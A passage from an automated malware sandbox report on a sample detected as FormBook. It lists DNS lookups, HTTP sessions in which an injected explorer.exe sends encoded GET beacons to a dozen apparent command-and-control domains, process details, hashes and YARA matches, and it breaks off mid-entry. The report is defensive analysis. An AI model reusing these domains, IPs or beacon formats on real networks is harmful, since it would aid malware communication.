Apr 12, 2021 10:06:55.946742058 CEST | 192.168.2.3 | 8.8.8.8 | 0xdd2d | Standard query (0) | www.funnyfootballmugs.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:01.284339905 CEST | 192.168.2.3 | 8.8.8.8 | 0xffff | Standard query (0) | www.cdefenders.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:06.384825945 CEST | 192.168.2.3 | 8.8.8.8 | 0x8c4 | Standard query (0) | www.przyczepy.net | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:11.618877888 CEST | 192.168.2.3 | 8.8.8.8 | 0x4de7 | Standard query (0) | www.borderlesstrade.info | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:17.345175982 CEST | 192.168.2.3 | 8.8.8.8 | 0x7657 | Standard query (0) | www.3992199.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:23.420985937 CEST | 192.168.2.3 | 8.8.8.8 | 0x1eb0 | Standard query (0) | www.montcoimmigrationlawyer.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:28.965080976 CEST | 192.168.2.3 | 8.8.8.8 | 0xfa46 | Standard query (0) | www.missjeschickt.com | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:34.469288111 CEST | 192.168.2.3 | 8.8.8.8 | 0x436e | Standard query (0) | www.plaisterpress.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Apr 12, 2021 10:06:12.694369078 CEST | 8.8.8.8 | 192.168.2.3 | 0xe041 | No error (0) | www.fibermover.com | fibermover.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:12.694369078 CEST | 8.8.8.8 | 192.168.2.3 | 0xe041 | No error (0) | fibermover.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:17.974059105 CEST | 8.8.8.8 | 192.168.2.3 | 0xb7ac | No error (0) | www.mojilifenoosa.com | mojilifenoosa.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:17.974059105 CEST | 8.8.8.8 | 192.168.2.3 | 0xb7ac | No error (0) | mojilifenoosa.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:23.935321093 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd | No error (0) | www.7chd.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:23.935321093 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 52.15.160.167 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:23.935321093 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.14.206.30 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:23.935321093 CEST | 8.8.8.8 | 192.168.2.3 | 0x8bd | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com |  | 3.13.255.157 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:29.378269911 CEST | 8.8.8.8 | 192.168.2.3 | 0x4b0 | Name error (3) | www.bl927.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:39.590591908 CEST | 8.8.8.8 | 192.168.2.3 | 0xd579 | No error (0) | www.hispekdiamond.com |  | 213.171.195.105 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:45.027236938 CEST | 8.8.8.8 | 192.168.2.3 | 0xaf00 | No error (0) | www.swashbug.com |  | 169.1.24.244 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:50.675977945 CEST | 8.8.8.8 | 192.168.2.3 | 0x2d44 | No error (0) | www.zagorafinancial.com | zagorafinancial.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:50.675977945 CEST | 8.8.8.8 | 192.168.2.3 | 0x2d44 | No error (0) | zagorafinancial.com |  | 162.209.114.201 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:06:56.030133963 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd2d | No error (0) | www.funnyfootballmugs.com | funny-football-mugs.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:56.030133963 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd2d | No error (0) | funny-football-mugs.myshopify.com | shops.myshopify.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:06:56.030133963 CEST | 8.8.8.8 | 192.168.2.3 | 0xdd2d | No error (0) | shops.myshopify.com |  | 23.227.38.74 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:01.374114037 CEST | 8.8.8.8 | 192.168.2.3 | 0xffff | Name error (3) | www.cdefenders.com | none | none | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:06.476445913 CEST | 8.8.8.8 | 192.168.2.3 | 0x8c4 | No error (0) | www.przyczepy.net |  | 185.253.212.22 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:11.728017092 CEST | 8.8.8.8 | 192.168.2.3 | 0x4de7 | No error (0) | www.borderlesstrade.info | www.borderlesstrade.info.cdn.cloudflare.net |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:07:17.966291904 CEST | 8.8.8.8 | 192.168.2.3 | 0x7657 | No error (0) | www.3992199.com | k9cdna.51w4.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:07:17.966291904 CEST | 8.8.8.8 | 192.168.2.3 | 0x7657 | No error (0) | k9cdna.51w4.com |  | 45.142.156.44 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:23.506768942 CEST | 8.8.8.8 | 192.168.2.3 | 0x1eb0 | No error (0) | www.montcoimmigrationlawyer.com | montcoimmigrationlawyer.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:07:23.506768942 CEST | 8.8.8.8 | 192.168.2.3 | 0x1eb0 | No error (0) | montcoimmigrationlawyer.com |  | 184.168.131.241 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:29.043720007 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa46 | No error (0) | www.missjeschickt.com | missjeschickt.com |  | CNAME (Canonical name) | IN (0x0001)
Apr 12, 2021 10:07:29.043720007 CEST | 8.8.8.8 | 192.168.2.3 | 0xfa46 | No error (0) | missjeschickt.com |  | 81.169.145.72 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:34.549664021 CEST | 8.8.8.8 | 192.168.2.3 | 0x436e | No error (0) | www.plaisterpress.com |  | 104.21.24.135 | A (IP address) | IN (0x0001)
Apr 12, 2021 10:07:34.549664021 CEST | 8.8.8.8 | 192.168.2.3 | 0x436e | No error (0) | www.plaisterpress.com |  | 172.67.218.244 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.fibermover.com
• www.mojilifenoosa.com
• www.7chd.com
• www.hispekdiamond.com
• www.swashbug.com
• www.zagorafinancial.com
• www.funnyfootballmugs.com
• www.przyczepy.net
• www.3992199.com
• www.montcoimmigrationlawyer.com
• www.missjeschickt.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.34970934.102.136.18080C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:12.742605925 CEST1025OUTGET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.fibermover.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:12.886359930 CEST1026INHTTP/1.1 403 Forbidden
                                                                            Server: openresty
                                                                            Date: Mon, 12 Apr 2021 08:06:12 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 275
                                                                            ETag: "6070a8c0-113"
                                                                            Via: 1.1 google
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.349711184.168.131.24180C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Apr 12, 2021 10:06:18.181508064 CEST1029OUTGET /uoe8/?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp HTTP/1.1
                                                                            Host: www.mojilifenoosa.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Apr 12, 2021 10:06:18.420839071 CEST1029INHTTP/1.1 301 Moved Permanently
                                                                            Server: nginx/1.16.1
                                                                            Date: Mon, 12 Apr 2021 08:06:18 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Location: http://www.mojiproducts.com/register?Dnh8=CVv7qMV6HbciCWFzqhUZZAQ0US+YdWqRbJ1eYpd5+PQQEEyRiYk8iw/aqhx7FohNRjRK&pPB=K2MxltkHBDK4hDMp
                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


Session ID: 10 | Source IP: 192.168.2.3 | Source Port: 49734 | Destination IP: 81.169.145.72 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:07:29.401462078 CEST | kBytes transferred: 5087 | Direction: OUT
Data:
GET /uoe8/?Dnh8=4x9Go+G4sQK1bPcn4vkzPWadXV0GNuVhhd/eQWnbDPmuQCX7Nztt7R8hTxXUs1RW0ALQ&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.missjeschickt.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:07:29.445220947 CEST | kBytes transferred: 5088 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 12 Apr 2021 08:07:29 GMT
Server: Apache/2.4.46 (Unix)
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


Session ID: 11 | Source IP: 192.168.2.3 | Source Port: 49736 | Destination IP: 34.102.136.180 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:07:39.705074072 CEST | kBytes transferred: 5090 | Direction: OUT
Data:
GET /uoe8/?Dnh8=6wr609Vx9lIYE8xJyDK49BerhrrLsGkNJqd9AfCiKUtPUCt4zBl+uaOpo8ym8tjcWxTe&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.fibermover.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:07:39.845865965 CEST | kBytes transferred: 5091 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 12 Apr 2021 08:07:39 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6070a8c0-113"
Via: 1.1 google
Connection: close
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49713 | Destination IP: 52.15.160.167 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:06:24.103583097 CEST | kBytes transferred: 1034 | Direction: OUT
Data:
GET /uoe8/?Dnh8=pp2ekQWroypTFKaJa5Qkcd1bUyGAkfDbiqxtSX5G9L70Cmz7PeGJVxgmdicR3ONQ4/wh&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.7chd.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:06:24.241137028 CEST | kBytes transferred: 1035 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Date: Mon, 12 Apr 2021 08:06:24 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID: 3 | Source IP: 192.168.2.3 | Source Port: 49718 | Destination IP: 213.171.195.105 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:06:39.648039103 CEST | kBytes transferred: 4176 | Direction: OUT
Data:
GET /uoe8/?Dnh8=UhlVi8jLiQUXpO3Mm3lJbnFIbsRb97T5i2flOgFV3YbeH0Xk3z/nbJUyPEwPPltkxnEn&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.hispekdiamond.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:06:39.703871965 CEST | kBytes transferred: 4176 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.16.1
Date: Mon, 12 Apr 2021 08:06:39 GMT
Content-Type: text/html
Content-Length: 1358
Last-Modified: Wed, 02 Sep 2015 11:05:06 GMT
Connection: close
ETag: "55e6d7e2-54e"
Accept-Ranges: bytes


Session ID: 4 | Source IP: 192.168.2.3 | Source Port: 49721 | Destination IP: 169.1.24.244 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:06:45.261780977 CEST | kBytes transferred: 4999 | Direction: OUT
Data:
GET /uoe8/?Dnh8=jbWl/12JT1iDRb0v1vq5On9CelmHmR3hJr6gjt0xDgcmriA4IMeiSysiloI+majB4Luo&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.swashbug.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:06:45.496073008 CEST | kBytes transferred: 5000 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Apr 2021 08:06:45 GMT
Content-Type: text/html
Content-Length: 389
Last-Modified: Tue, 28 Apr 2020 08:37:12 GMT
Connection: close
Vary: Accept-Encoding
ETag: "5ea7eb38-185"
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Server-Powered-By: AfrRouter
Accept-Ranges: bytes
Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title>Domain Registered</title> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" /> </head> <body> <script type="text/javascript" src="https://cdn.afrihost.com/resources/domain_pages/coming_soon.js"></script> </body></html>


Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49723 | Destination IP: 162.209.114.201 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:06:50.801923037 CEST | kBytes transferred: 5012 | Direction: OUT
Data:
GET /uoe8/?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.zagorafinancial.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:06:50.927325964 CEST | kBytes transferred: 5013 | Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Server: Apache/2.4.38 (Debian)
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 12 Apr 2021 08:06:50 GMT
Location: http://www.zagorafinancial.com/uoe8?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&pPB=K2MxltkHBDK4hDMp
Keep-Alive: timeout=5, max=100
Connection: close
Set-Cookie: X-Mapping-fjhppofk=F4200E476AB699C7006F4ED450BE5EF4; path=/
Content-Length: 431
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.zagorafinancial.com/uoe8?Dnh8=0AgkmMdb/xcAtot8xloO7jEL6e2GWsoAGGF4g5velsS4rIzaA3O5+OYWQMQKg8Hr7C9A&amp;pPB=K2MxltkHBDK4hDMp">here</a>.</p><hr><address>Apache/2.4.38 (Debian) Server at www.zagorafinancial.com Port 80</address></body></html>


Session ID: 6 | Source IP: 192.168.2.3 | Source Port: 49725 | Destination IP: 23.227.38.74 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:06:56.074539900 CEST | kBytes transferred: 5027 | Direction: OUT
Data:
GET /uoe8/?Dnh8=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.funnyfootballmugs.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:06:56.251104116 CEST | kBytes transferred: 5029 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Date: Mon, 12 Apr 2021 08:06:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Sorting-Hat-PodId: -1
X-Dc: gcp-us-central1
X-Request-ID: ee683330-34a4-49fd-a8a8-061e94606168
Set-Cookie: _shopify_fs=2021-04-12T08%3A06%3A56Z; Expires=Tue, 12-Apr-22 08:06:56 GMT; Domain=funnyfootballmugs.com; Path=/; SameSite=Lax
X-XSS-Protection: 1; mode=block
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
CF-Cache-Status: DYNAMIC
cf-request-id: 0966b7a16d00004ed36109e000000001
Server: cloudflare
CF-RAY: 63eaf548a8ab4ed3-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;m


Session ID: 7 | Source IP: 192.168.2.3 | Source Port: 49726 | Destination IP: 185.253.212.22 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:07:06.537733078 CEST | kBytes transferred: 5035 | Direction: OUT
Data:
GET /uoe8/?Dnh8=TYKQicIMvKRESm/flOMvKt3N/kbr0v+cwHo5PwIdzkllwLOIwmCeEw+gbEKOgk8UbATi&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.przyczepy.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:07:06.602643967 CEST | kBytes transferred: 5035 | Direction: IN
Data:
HTTP/1.1 403 Forbidden
Server: nginx
Date: Mon, 12 Apr 2021 08:07:06 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID: 8 | Source IP: 192.168.2.3 | Source Port: 49732 | Destination IP: 45.142.156.44 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:07:18.188160896 CEST | kBytes transferred: 5085 | Direction: OUT
Data:
GET /uoe8/?Dnh8=h2lbrHqA/lU/5ydhtyDssHwS0ovAY6emeVgF9WK6HhWxxVaP+H0Yfne8Qd/1EA4oYSoB&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.3992199.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:07:18.403820038 CEST | kBytes transferred: 5085 | Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 12 Apr 2021 07:55:43 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 9 | Source IP: 192.168.2.3 | Source Port: 49733 | Destination IP: 184.168.131.241 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Apr 12, 2021 10:07:23.705914021 CEST | kBytes transferred: 5086 | Direction: OUT
Data:
GET /uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp HTTP/1.1
Host: www.montcoimmigrationlawyer.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Apr 12, 2021 10:07:23.957165956 CEST | kBytes transferred: 5087 | Direction: IN
Data:
HTTP/1.1 301 Moved Permanently
Server: nginx/1.16.1
Date: Mon, 12 Apr 2021 08:07:23 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Location: https://shglawpa.com/uoe8/?Dnh8=DVW7OxuTiipzhEotDzIJzGfsiMq3vXOqW3PM8kZWjghPJAmdu1p3BOMI8OM6bfwnU86n&pPB=K2MxltkHBDK4hDMp
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                            Code Manipulations

                                                                            Statistics

                                                                            Behavior


                                                                            System Behavior

                                                                            General

Start time: 10:05:27
Start date: 12/04/2021
Path: C:\Users\user\Desktop\NdBLyH2h5d.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\NdBLyH2h5d.exe'
Imagebase: 0x400000
File size: 207111 bytes
MD5 hash: 3FEF6985AF0D52AB6701DF170096B504
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

                                                                            General

                                                                            Start time:10:05:28
                                                                            Start date:12/04/2021
                                                                            Path:C:\Users\user\Desktop\NdBLyH2h5d.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\NdBLyH2h5d.exe'
                                                                            Imagebase:0x400000
                                                                            File size:207111 bytes
                                                                            MD5 hash:3FEF6985AF0D52AB6701DF170096B504
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:low

                                                                            General

                                                                            Start time:10:05:32
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\explorer.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:
                                                                            Imagebase:0x7ff714890000
                                                                            File size:3933184 bytes
                                                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            General

                                                                            Start time:10:05:43
                                                                            Start date:12/04/2021
                                                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                            Imagebase:0x300000
                                                                            File size:61952 bytes
                                                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                            Reputation:high

                                                                            General

                                                                            Start time:10:05:48
